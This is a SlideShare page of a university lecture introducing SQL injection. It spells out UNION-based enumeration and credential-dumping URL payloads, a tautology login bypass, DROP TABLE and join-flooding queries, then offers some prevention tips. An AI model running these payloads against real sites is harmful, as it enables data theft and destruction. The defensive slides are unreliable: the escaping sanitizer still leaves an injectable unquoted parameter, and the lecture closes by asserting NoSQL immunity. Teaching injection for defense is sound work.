SlideShare a Scribd company logo

A Brief Introduction in SQL Injection

Download as PPT, PDF
Sina Manavi
Sina Manavi
Education
1 of 22
Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
• Introduction • Why SQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
 SQL Injection may happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
 Simple example:  Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
 www.yourtarget.com/list?id=5  if you want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
 The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
 Finding the URL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
 Now its time to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
 And Finally its time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
 Now we can Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
If user_list contains 1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
Insert newuser into tbl_user The maliciouse code can be : DROP table tbl_user
 How it works Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
 Security is the developer’s job  No database, connector, or framework can prevent SQL injection all the time
• Implement proper Error Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
<?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
Vipin Samar, Oracle vice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
 Using Stroprocedures: CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
 I don’t have to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
NoSQL databases are immune to SQL injection.

Recommended

Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 

Recommended

Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
 
DDOS Attack
DDOS Attack DDOS Attack
DDOS Attack Ahmed Salama
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Whatis SQL Injection.pptx
Whatis SQL Injection.pptxWhatis SQL Injection.pptx
Whatis SQL Injection.pptxSimplilearn
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRaghav Bisht
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionVuz Dở Hơi
 

More Related Content

What's hot

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...Edureka!
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
Whatis SQL Injection.pptx
Whatis SQL Injection.pptxWhatis SQL Injection.pptx
Whatis SQL Injection.pptxSimplilearn
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRaghav Bisht
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 

What's hot (20)

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Sql injection
Sql injectionSql injection
Sql injection
 
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
What is SQL Injection Attack | How to prevent SQL Injection Attacks? | Cybers...
 
DDOS Attack
DDOS Attack DDOS Attack
DDOS Attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 
Xss attack
Xss attackXss attack
Xss attack
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Whatis SQL Injection.pptx
Whatis SQL Injection.pptxWhatis SQL Injection.pptx
Whatis SQL Injection.pptx
 
Sql injection
Sql injectionSql injection
Sql injection
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
Sql injection
Sql injectionSql injection
Sql injection
 

Viewers also liked

SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionVuz Dở Hơi
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionSatyajit Mukherjee
 
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!EC-Council
 
Java Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingJava Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingAnton Keks
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesiscorbanmiferreira
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)Guy Podjarny
 
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas Anna Morrison
 
9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toánLớp kế toán trưởng
 
Introduction to SEO Presentation
Introduction to SEO PresentationIntroduction to SEO Presentation
Introduction to SEO Presentation7thingsmedia
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 

Viewers also liked (20)

SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL Injection
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injection
 
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
 
HTTPS, Here and Now
HTTPS, Here and NowHTTPS, Here and Now
HTTPS, Here and Now
 
Java Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingJava Course 13: JDBC & Logging
Java Course 13: JDBC & Logging
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesis
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
 
Jdbc ppt
Jdbc pptJdbc ppt
Jdbc ppt
 
Mime
MimeMime
Mime
 
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
 
Bài tập kế toán tài chính doanh nghiệp có đáp án
Bài tập kế toán tài chính doanh nghiệp có đáp ánBài tập kế toán tài chính doanh nghiệp có đáp án
Bài tập kế toán tài chính doanh nghiệp có đáp án
 
9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán
 
Introduction to SEO Presentation
Introduction to SEO PresentationIntroduction to SEO Presentation
Introduction to SEO Presentation
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Jdbc Ppt
Jdbc PptJdbc Ppt
Jdbc Ppt
 

Similar to A Brief Introduction in SQL Injection

Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxDave Stokes
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampFelipe Prado
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 

Similar to A Brief Introduction in SQL Injection (20)

SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
Sql injection
Sql injectionSql injection
Sql injection
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
Sql security
Sql securitySql security
Sql security
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptx
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Sq li
Sq liSq li
Sq li
 
Web application security
Web application securityWeb application security
Web application security
 
Code injection
Code injectionCode injection
Code injection
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 

More from Sina Manavi

Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Sina Manavi
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsSina Manavi
 
Password Attack
Password Attack Password Attack
Password Attack Sina Manavi
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting Sina Manavi
 
Password Cracking
Password Cracking Password Cracking
Password Cracking Sina Manavi
 
An Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecurityAn Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecuritySina Manavi
 
Aes (advance encryption standard)
Aes (advance encryption standard) Aes (advance encryption standard)
Aes (advance encryption standard) Sina Manavi
 
Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Sina Manavi
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynetSina Manavi
 
Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Sina Manavi
 

More from Sina Manavi (10)

Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media Forensics
 
Password Attack
Password Attack Password Attack
Password Attack
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting
 
Password Cracking
Password Cracking Password Cracking
Password Cracking
 
An Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecurityAn Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile Security
 
Aes (advance encryption standard)
Aes (advance encryption standard) Aes (advance encryption standard)
Aes (advance encryption standard)
 
Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynet
 
Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi
 

Recently uploaded

Introduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher EducationIntroduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher Educationpboyjonauth
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfsanyamsingh5019
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Celine George
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxRoyAbrique
 
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdfEnzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdfSumit Tiwari
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxPOINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptx
POINT- BIOCHEMISTRY SEM 2 ENZYMES UNIT 5.pptxSayali Powar
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsKarinaGenton
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 

Recently uploaded (20)

Introduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher EducationIntroduction to ArtificiaI Intelligence in Higher Education
Introduction to ArtificiaI Intelligence in Higher Education
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 
Sanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdfSanyam Choudhary Chemistry practical.pdf
Sanyam Choudhary Chemistry practical.pdf
 
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Bikash Puri Delhi reach out to us at 🔝9953056974🔝
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
 
Enzyme, Pharmaceutical Aids, Miscellaneous Last Part of Chapter no 5th.pdf
